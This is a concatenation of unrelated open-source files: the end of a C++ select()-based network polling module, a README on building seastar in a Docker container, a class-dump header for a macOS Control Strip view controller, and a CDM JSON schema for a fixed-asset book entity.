    storeAppendPrintf(sentry, "Current incoming_tcp_interval: %d\n",
                      incoming_tcp_interval >> INCOMING_FACTOR);
    storeAppendPrintf(sentry, "\n");
    storeAppendPrintf(sentry, "Histogram of events per incoming socket type\n");
    storeAppendPrintf(sentry, "ICP Messages handled per comm_select_udp_incoming() call:\n");
    statCounter.comm_udp_incoming.dump(sentry, statHistIntDumper);
    storeAppendPrintf(sentry, "DNS Messages handled per comm_select_dns_incoming() call:\n");
    statCounter.comm_dns_incoming.dump(sentry, statHistIntDumper);
    storeAppendPrintf(sentry, "HTTP Messages handled per comm_select_tcp_incoming() call:\n");
    statCounter.comm_tcp_incoming.dump(sentry, statHistIntDumper);
}
/*
 * Keep global_readfds and nreadfds in sync with the presence/absence
 * of a read handler on fd.  Idempotent: repeated calls with the same
 * state change nothing.
 */
void
commUpdateReadBits(int fd, PF * handler)
{
    const bool tracked = FD_ISSET(fd, &global_readfds);

    if (handler && !tracked) {
        FD_SET(fd, &global_readfds);
        ++nreadfds;
    } else if (!handler && tracked) {
        FD_CLR(fd, &global_readfds);
        --nreadfds;
    }
}
/*
 * Keep global_writefds and nwritefds in sync with the presence/absence
 * of a write handler on fd.  Idempotent, mirroring commUpdateReadBits().
 */
void
commUpdateWriteBits(int fd, PF * handler)
{
    const bool tracked = FD_ISSET(fd, &global_writefds);

    if (handler && !tracked) {
        FD_SET(fd, &global_writefds);
        ++nwritefds;
    } else if (!handler && tracked) {
        FD_CLR(fd, &global_writefds);
        --nwritefds;
    }
}
/* Called by async-io or diskd to speed up the polling */
void
Comm::QuickPollRequired(void)
{
    /* Shrink the select() timeout cap from its 1000 ms default to
     * 10 ms so helper I/O completions are noticed promptly. */
    MAX_POLL_TIME = 10;
}
#endif /* USE_SELECT_WIN32 */
| {
"pile_set_name": "Github"
} |
## Building seastar in Docker container
To build a Docker image:
```
docker build -t seastar-dev docker/dev
```
Create a shell function for building inside the container (bash syntax given):
```
$ seabuild() { docker run -v $HOME/seastar/:/seastar -u $(id -u):$(id -g) -w /seastar -t seastar-dev "$@"; }
```
(it is recommended to put this inside your .bashrc or similar)
To build inside a container:
```
$ seabuild ./configure.py
$ seabuild ninja -C build/release
```
| {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Jun 9 2015 22:53:21).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2014 by Steve Nygard.
//
#import <AppKit/NSViewController.h>
@class NSButton, NSStackView, NSView, _TtC12ControlStrip24ControlStripBackdropView;
// Full-size Control Strip view controller, as reconstructed by class-dump
// from compiled binary metadata.  The ivar types could not be parsed by
// class-dump (likely Swift-mangled — TODO confirm), hence the placeholder
// comments below; the synthesized properties expose the usable types.
@interface ControlStrip.ControlStripFull : NSViewController
{
    // Error parsing type: , name: closeView
    // Error parsing type: , name: closeButton
    // Error parsing type: , name: backdropView
    // Error parsing type: , name: buttonStack
    // Error parsing type: , name: configuration
}

- (CDUnknownBlockType).cxx_destruct;
- (id)initWithCoder:(id)arg1;
- (id)initWithNibName:(id)arg1 bundle:(id)arg2;
// Dismisses the control strip; wired to the close button action.
- (void)dismiss:(id)arg1;
- (void)awakeFromNib;
@property(nonatomic, retain) NSStackView *buttonStack; // @synthesize buttonStack;
@property(nonatomic, retain) _TtC12ControlStrip24ControlStripBackdropView *backdropView; // @synthesize backdropView;
@property(nonatomic, retain) NSButton *closeButton; // @synthesize closeButton;
@property(nonatomic, retain) NSView *closeView; // @synthesize closeView;
@end
| {
"pile_set_name": "Github"
} |
{
"jsonSchemaSemanticVersion": "1.0.0",
"imports": [
{
"corpusPath": "cdm:/foundations.1.2.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Common.1.0.cdm.json",
"moniker": "base_Common"
},
{
"corpusPath": "/core/operationsCommon/DataEntityView.1.0.cdm.json",
"moniker": "base_DataEntityView"
},
{
"corpusPath": "AssetAcquisitionMethod.1.1.cdm.json"
},
{
"corpusPath": "AssetBookTable.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Transaction/AssetChangesHistory.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Parameter/AssetConsumptionFactor.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Parameter/AssetConsumptionUnit.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Group/AssetGroup.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Parameter/AssetLedger.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Parameter/AssetReserveType.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Group/AssetRevaluationGroup.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Parameter/AssetSorting.1.1.cdm.json"
},
{
"corpusPath": "AssetTable.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Transaction/AssetTrans.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/AccountsReceivable/Transaction/CustInvoiceJour.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Common/Customer/Main/CustTable.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FinancialDimensions/Main/DimensionAttributeValueSet.1.0.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Group/AssetDepreciationGroup_W.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FinancialDimensions/Main/MainAccount.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/SupplyChain/ProcurementAndSourcing/WorksheetHeader/PurchTable.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/SupplyChain/Vendor/Main/VendTable.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Parameter/AssetDepreciationProfile.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/SupplyChain/Inventory/Transaction/InventTransOrigin.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Common/Currency/Group/Currency.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/RAsset/Group/RAssetSubGroup.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/System/SystemAdministration/Framework/NumberSequenceGroup.1.0.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/SupplyChain/SalesAndMarketing/WorksheetHeader/SalesTable.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/Ledger/Main/CompanyInfo.1.1.cdm.json"
}
],
"definitions": [
{
"entityName": "AssetBook",
"extendsEntity": "base_Common/Common",
"exhibitsTraits": [
{
"traitReference": "is.CDM.entityVersion",
"arguments": [
{
"name": "versionNumber",
"value": "1.1"
}
]
}
],
"hasAttributes": [
{
"name": "AcquisitionDate",
"dataType": "AssetAcquisitionDate",
"isNullable": true,
"description": ""
},
{
"name": "AcquisitionMethod",
"dataType": "AssetAcquisitionMethodId",
"isNullable": true,
"description": ""
},
{
"name": "AcquisitionPrice",
"dataType": "AssetAcquisitionPrice",
"isNullable": true,
"description": ""
},
{
"name": "AllocationStartDate_JP",
"dataType": "TransDate",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "AllowableLimitForAccumulatedDepType_JP",
"dataType": "integer",
"isNullable": true,
"description": ""
},
{
"name": "AssetCostAccountingType_PL",
"dataType": "integer",
"isNullable": true,
"description": ""
},
{
"name": "AssetDerogatoryModel_FR",
"dataType": "AssetDerogatoryValueModel_FR",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "AssetFairValue",
"dataType": "AssetFairValue",
"isNullable": true,
"description": ""
},
{
"name": "AssetGroup",
"dataType": "AssetGroupId",
"isNullable": true,
"description": ""
},
{
"name": "AssetGroupDepreciation_IN",
"dataType": "AssetGroupDepreciation_IN",
"isNullable": true,
"description": ""
},
{
"name": "AssetId",
"dataType": "AssetId",
"description": ""
},
{
"name": "AssetPurchaseDate_PL",
"dataType": "PlAssetPurchaseDate",
"isNullable": true,
"description": ""
},
{
"name": "AssetRevisedAcquisitionCost_JP",
"dataType": "AssetRevisedAcquisitionCost_JP",
"isNullable": true,
"description": ""
},
{
"name": "AssetRevisedAcquisitionCostStartDate_JP",
"dataType": "AssetTransDate",
"isNullable": true,
"description": ""
},
{
"name": "BookId",
"dataType": "AssetBookId",
"description": ""
},
{
"name": "CategorizationDate_CZ",
"dataType": "CzAssetCategorizationDate",
"isNullable": true,
"description": ""
},
{
"name": "CheckMaxPercentRB",
"dataType": "AssetCheckMaxPercentRB_DE",
"isNullable": true,
"displayName": "Check maximum percent",
"description": ""
},
{
"name": "ConsumptionFactorId",
"dataType": "AssetConsumptionFactorId",
"isNullable": true,
"description": ""
},
{
"name": "ConsumptionQtyEstimated",
"dataType": "AssetConsumptionQtyEstimated",
"isNullable": true,
"description": ""
},
{
"name": "ConsumptionUnitId",
"dataType": "AssetConsumptionUnitId",
"isNullable": true,
"description": ""
},
{
"name": "CustAccount",
"dataType": "CustAccount",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "CustInvoiceId",
"dataType": "CustInvoiceId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "DefaultDimension",
"dataType": "LedgerDefaultDimensionValueSet",
"isNullable": true,
"description": ""
},
{
"name": "Depreciation",
"dataType": "AssetDepreciate",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationAmountUnit",
"dataType": "AssetDepreciationAmountUnit",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationConvention",
"dataType": "integer",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationGroupId_W",
"dataType": "AssetDepreciationGroupId_W",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationStartDate",
"dataType": "AssetDepreciationStartDate",
"isNullable": true,
"description": ""
},
{
"name": "DeprPrevPeriods_PL",
"dataType": "AssetAmount",
"isNullable": true,
"displayName": "Depreciation amount before registration",
"description": ""
},
{
"name": "DeprPrevPeriodsNonCost_PL",
"dataType": "AssetAmount",
"isNullable": true,
"displayName": "Non-cost depreciation amount before registration",
"description": ""
},
{
"name": "DeprPrevPriorCost_PL",
"dataType": "AssetAmount",
"isNullable": true,
"displayName": "Depreciation amount before registration (prior years)",
"description": ""
},
{
"name": "DeprPrevPriorNonCost_PL",
"dataType": "AssetAmount",
"isNullable": true,
"displayName": "Non-cost depreciation amount before registration (prior years)",
"description": ""
},
{
"name": "DisposalDate",
"dataType": "AssetDisposalDate",
"isNullable": true,
"description": ""
},
{
"name": "DueFrom_PSN",
"dataType": "RefRecId",
"isNullable": true,
"displayName": "Transfer from account",
"description": ""
},
{
"name": "DueTo_PSN",
"dataType": "RefRecId",
"isNullable": true,
"displayName": "Transfer to account",
"description": ""
},
{
"name": "EquallyDividedStartDate_JP",
"dataType": "AssetDepYearsEquallyDividedStartDate_JP",
"isNullable": true,
"description": ""
},
{
"name": "ExceedingNetBookValue",
"dataType": "ExceedingNetBookValue",
"isNullable": true,
"description": ""
},
{
"name": "IsDerogatoryBook_FR",
"dataType": "AssetDerogatoryBook_FR",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "IsDisposalSameYear",
"dataType": "FixedAssetDisposalSameYear",
"isNullable": true,
"description": ""
},
{
"name": "IsShorteningUsefulLife_JP",
"dataType": "AssetIsShorteningUsefulLife_JP",
"isNullable": true,
"description": ""
},
{
"name": "IsTrueUpDepreciation",
"dataType": "FixedAssetTrueUpDepreciation",
"isNullable": true,
"description": ""
},
{
"name": "LastDepreciationDate",
"dataType": "AssetLastDepreciationDate",
"isNullable": true,
"description": ""
},
{
"name": "LastDepreciationDateAccelerated_JP",
"dataType": "AssetLastDepreciationDate",
"isNullable": true,
"description": ""
},
{
"name": "LastDepreciationDateExtraOrd",
"dataType": "AssetLastDepreciationDate",
"isNullable": true,
"description": ""
},
{
"name": "LastReserveAllocationDate_JP",
"dataType": "TransDate",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "LifeTime",
"dataType": "AssetLifeTime",
"isNullable": true,
"description": ""
},
{
"name": "LifeTimeRest",
"dataType": "AssetLifeTimeRest",
"isNullable": true,
"description": ""
},
{
"name": "LVPTransferDate_AU",
"dataType": "AssetLowValuePoolTransferDate_AU",
"isNullable": true,
"description": ""
},
{
"name": "LVPTransferId_AU",
"dataType": "AssetLowValuePoolTransferId_AU",
"isNullable": true,
"description": ""
},
{
"name": "MaxPercentRB",
"dataType": "AssetMaxPercentRB_DE",
"isNullable": true,
"displayName": "Percentage after validation",
"description": ""
},
{
"name": "NegativeNetBookValue",
"dataType": "NegativeNetBookValue",
"isNullable": true,
"description": ""
},
{
"name": "OrigAcquisitionDate_IN",
"dataType": "AssetAcquisitionDate",
"isNullable": true,
"description": ""
},
{
"name": "Percentage_PL",
"dataType": "Percent",
"isNullable": true,
"displayName": "Percentage",
"description": ""
},
{
"name": "PercentageAlt_PL",
"dataType": "Percent",
"isNullable": true,
"description": ""
},
{
"name": "PercentageExt_PL",
"dataType": "Percent",
"isNullable": true,
"description": ""
},
{
"name": "PostingProfile",
"dataType": "AssetPostingProfile",
"isNullable": true,
"description": ""
},
{
"name": "PurchId",
"dataType": "PurchId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "RBSLFactor",
"dataType": "AssetRBSLFactor",
"isNullable": true,
"description": ""
},
{
"name": "ReplacementDate",
"dataType": "AssetReplacementDate",
"isNullable": true,
"description": ""
},
{
"name": "ReserveTypeId",
"dataType": "AssetReserveTypeId",
"isNullable": true,
"description": ""
},
{
"name": "RevaluationGroupId",
"dataType": "AssetRevaluationGroupId",
"isNullable": true,
"description": ""
},
{
"name": "SaleValue",
"dataType": "AssetSaleValue",
"isNullable": true,
"description": ""
},
{
"name": "ScrapValue",
"dataType": "AssetScrapValue",
"isNullable": true,
"description": ""
},
{
"name": "ServiceLife",
"dataType": "AssetServiceLife",
"isNullable": true,
"description": ""
},
{
"name": "ServiceLifeMonths_FR",
"dataType": "AssetServiceLifeMonths",
"isNullable": true,
"description": ""
},
{
"name": "ServiceLifeYears_FR",
"dataType": "AssetServiceLifeYears",
"isNullable": true,
"description": ""
},
{
"name": "SortingId",
"dataType": "AssetSortingId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "SortingId2",
"dataType": "AssetSortingId2",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "SortingId3",
"dataType": "AssetSortingId3",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "SpecialDepAllocationConvention_JP",
"dataType": "integer",
"isNullable": true,
"description": ""
},
{
"name": "SpecialDepAllocationPeriods_JP",
"dataType": "AssetSpecialDepAllocationPeriods_JP",
"isNullable": true,
"description": ""
},
{
"name": "SpecialDepAllocationUnit_JP",
"dataType": "AssetSpecialDepAllocationUnit_JP",
"isNullable": true,
"description": ""
},
{
"name": "SpecialDepLastAllocationDate_JP",
"dataType": "AssetSpecialDepLastAllocationDate_JP",
"isNullable": true,
"description": ""
},
{
"name": "SpecialDepStartDate_JP",
"dataType": "AssetSpecialDepStartDate_JP",
"isNullable": true,
"description": ""
},
{
"name": "Status",
"dataType": "integer",
"isNullable": true,
"description": ""
},
{
"name": "SummarizeByMajorType_JP",
"dataType": "AssetSummarizeByMajorType_JP",
"isNullable": true,
"description": ""
},
{
"name": "UsedFromDate",
"dataType": "AssetUsedFromDate",
"isNullable": true,
"description": ""
},
{
"name": "VendAccount",
"dataType": "VendAccount",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "VendInvoiceId",
"dataType": "VendInvoiceId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "DepreciationProfile",
"dataType": "AssetDepreciationProfileId",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationAltProfile",
"dataType": "AssetDepreciationAltProfileId",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationExtProfile",
"dataType": "AssetDepreciationExtProfileId",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationAcceleratedProfile_JP",
"dataType": "AssetDepreciationAcceleratedProfileId_JP",
"isNullable": true,
"description": ""
},
{
"name": "InventTransId_RU",
"dataType": "InventTransId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "CurrencyCode_RU",
"dataType": "CurrencyCode",
"isNullable": true,
"description": ""
},
{
"name": "SubGroupId_RU",
"dataType": "RAssetSubGroupId",
"isNullable": true,
"description": ""
},
{
"name": "Lock_RU",
"dataType": "AssetLock_RU",
"isNullable": true,
"description": ""
},
{
"name": "NumberSequenceGroupId_RU",
"dataType": "NumberSequenceGroupId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "PurchInternalInvoiceId_RU",
"dataType": "PurchInternalInvoiceId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "SalesId_RU",
"dataType": "SalesId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "DepreciationExtProfile_JP",
"dataType": "AssetDepreciationExtProfileId",
"isNullable": true,
"description": ""
},
{
"name": "AcquisitionPriceReportingCurrency",
"dataType": "AssetAcquisitionPriceReportingCurrency",
"isNullable": true,
"description": ""
},
{
"name": "ScrapValueReportingCurrency",
"dataType": "AssetScrapValueReportingCurrency",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationAmountUnitReportingCurrency",
"dataType": "AssetDepreciationAmountUnitReportingCurrency",
"isNullable": true,
"description": ""
},
{
"name": "DataAreaId",
"dataType": "string",
"isReadOnly": true
},
{
"entity": {
"entityReference": "AssetAcquisitionMethod"
},
"name": "Relationship_AssetAcquisitionMethodRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetBookTable"
},
"name": "Relationship_AssetBookTableRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetChangesHistory"
},
"name": "Relationship_AssetChangesHistoryRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetConsumptionFactor"
},
"name": "Relationship_AssetConsumptionFactorRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetConsumptionUnit"
},
"name": "Relationship_AssetConsumptionUnitRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetGroup"
},
"name": "Relationship_AssetGroup_AssetRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetLedger"
},
"name": "Relationship_AssetLedgerRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetReserveType"
},
"name": "Relationship_AssetReserveTypeRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetRevaluationGroup"
},
"name": "Relationship_AssetRevaluationGroupRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetSorting"
},
"name": "Relationship_AssetSorting_SortingIdRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetSorting"
},
"name": "Relationship_AssetSorting_SortingId2Relationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetSorting"
},
"name": "Relationship_AssetSorting_SortingId3Relationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetTable"
},
"name": "Relationship_AssetTable_AssertIdRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetTable"
},
"name": "Relationship_AssetTable_LVPTransferIdRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetTrans"
},
"name": "Relationship_assettransRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "CustInvoiceJour"
},
"name": "Relationship_CustInvoiceRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "CustTable"
},
"name": "Relationship_CustTableRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "DimensionAttributeValueSet"
},
"name": "Relationship_DefaultDimensionRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetDepreciationGroup_W"
},
"name": "Relationship_DepreciationGroupRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "MainAccount"
},
"name": "Relationship_DueFrom_PSNRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "MainAccount"
},
"name": "Relationship_DueTo_PSNRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "PurchTable"
},
"name": "Relationship_PurchTableRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "VendTable"
},
"name": "Relationship_VendTableRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetDepreciationProfile"
},
"name": "Relationship_DepreciationProfileRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetDepreciationProfile"
},
"name": "Relationship_DepreciationAltProfileRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetDepreciationProfile"
},
"name": "Relationship_DepreciationExtProfileRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetDepreciationProfile"
},
"name": "Relationship_DepreciationAcceleratedProfile_JPRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "InventTransOrigin"
},
"name": "Relationship_InventTransOrigin_RURelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "Currency"
},
"name": "Relationship_Currency_RURelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "RAssetSubGroup"
},
"name": "Relationship_RAssetSubGroup_RURelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "NumberSequenceGroup"
},
"name": "Relationship_NumberSequenceGroup_RURelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "SalesTable"
},
"name": "Relationship_SalesTableRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "CompanyInfo"
},
"name": "Relationship_CompanyRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
}
],
"displayName": "Fixed asset book"
},
{
"dataTypeName": "AssetAcquisitionDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetAcquisitionMethodId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetAcquisitionPrice",
"extendsDataType": "decimal"
},
{
"dataTypeName": "TransDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetDerogatoryValueModel_FR",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetFairValue",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetGroupId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetGroupDepreciation_IN",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetId",
"extendsDataType": "string"
},
{
"dataTypeName": "PlAssetPurchaseDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetRevisedAcquisitionCost_JP",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetTransDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetBookId",
"extendsDataType": "string"
},
{
"dataTypeName": "CzAssetCategorizationDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetCheckMaxPercentRB_DE",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetConsumptionFactorId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetConsumptionQtyEstimated",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetConsumptionUnitId",
"extendsDataType": "string"
},
{
"dataTypeName": "CustAccount",
"extendsDataType": "string"
},
{
"dataTypeName": "CustInvoiceId",
"extendsDataType": "string"
},
{
"dataTypeName": "LedgerDefaultDimensionValueSet",
"extendsDataType": "bigInteger"
},
{
"dataTypeName": "AssetDepreciate",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetDepreciationAmountUnit",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetDepreciationGroupId_W",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetDepreciationStartDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetAmount",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetDisposalDate",
"extendsDataType": "date"
},
{
"dataTypeName": "RefRecId",
"extendsDataType": "bigInteger"
},
{
"dataTypeName": "AssetDepYearsEquallyDividedStartDate_JP",
"extendsDataType": "date"
},
{
"dataTypeName": "ExceedingNetBookValue",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetDerogatoryBook_FR",
"extendsDataType": "integer"
},
{
"dataTypeName": "FixedAssetDisposalSameYear",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetIsShorteningUsefulLife_JP",
"extendsDataType": "integer"
},
{
"dataTypeName": "FixedAssetTrueUpDepreciation",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetLastDepreciationDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetLifeTime",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetLifeTimeRest",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetLowValuePoolTransferDate_AU",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetLowValuePoolTransferId_AU",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetMaxPercentRB_DE",
"extendsDataType": "decimal"
},
{
"dataTypeName": "NegativeNetBookValue",
"extendsDataType": "integer"
},
{
"dataTypeName": "Percent",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetPostingProfile",
"extendsDataType": "string"
},
{
"dataTypeName": "PurchId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetRBSLFactor",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetReplacementDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetReserveTypeId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetRevaluationGroupId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetSaleValue",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetScrapValue",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetServiceLife",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetServiceLifeMonths",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetServiceLifeYears",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetSortingId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetSortingId2",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetSortingId3",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetSpecialDepAllocationPeriods_JP",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetSpecialDepAllocationUnit_JP",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetSpecialDepLastAllocationDate_JP",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetSpecialDepStartDate_JP",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetSummarizeByMajorType_JP",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetUsedFromDate",
"extendsDataType": "date"
},
{
"dataTypeName": "VendAccount",
"extendsDataType": "string"
},
{
"dataTypeName": "VendInvoiceId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetDepreciationProfileId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetDepreciationAltProfileId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetDepreciationExtProfileId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetDepreciationAcceleratedProfileId_JP",
"extendsDataType": "string"
},
{
"dataTypeName": "InventTransId",
"extendsDataType": "string"
},
{
"dataTypeName": "CurrencyCode",
"extendsDataType": "string"
},
{
"dataTypeName": "RAssetSubGroupId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetLock_RU",
"extendsDataType": "integer"
},
{
"dataTypeName": "NumberSequenceGroupId",
"extendsDataType": "string"
},
{
"dataTypeName": "PurchInternalInvoiceId",
"extendsDataType": "string"
},
{
"dataTypeName": "SalesId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetAcquisitionPriceReportingCurrency",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetScrapValueReportingCurrency",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetDepreciationAmountUnitReportingCurrency",
"extendsDataType": "decimal"
}
]
} | {
"pile_set_name": "Github"
} |
// Copyright (c) Facebook, Inc. and its affiliates.
// All rights reserved.
//
// Copyright 2019 Google LLC
//
